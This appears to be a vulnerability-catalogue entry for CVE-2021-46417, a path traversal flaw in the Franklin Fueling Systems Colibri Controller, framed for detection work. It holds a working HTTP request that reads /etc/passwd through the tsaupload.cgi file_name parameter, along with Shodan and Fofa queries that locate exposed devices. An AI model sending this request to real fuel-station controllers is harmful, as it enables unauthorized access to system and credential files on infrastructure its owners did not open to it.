🔙 목록으로 돌아가기

CVE-2021-46417: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion

TitleFranklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
AuthorFor3stCo1d
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
RemediationApply the latest security patch or update provided by Franklin Fueling Systems to fix the LFI vulnerability.
CVSS Score7.5
EPSS Score0.92171
CVE IDCVE-2021-46417
CWE IDCWE-22
Shodan Queryhttp.html:"Franklin Fueling Systems"http.html:"franklin fueling systems"
Fofa Querybody="franklin fueling systems"
Tags cve2021 cve packetstorm franklinfueling lfi vkev vuln

🔍 Vulnerability Description

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.

🌐 HTTP Request

GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-46417.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-46417.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A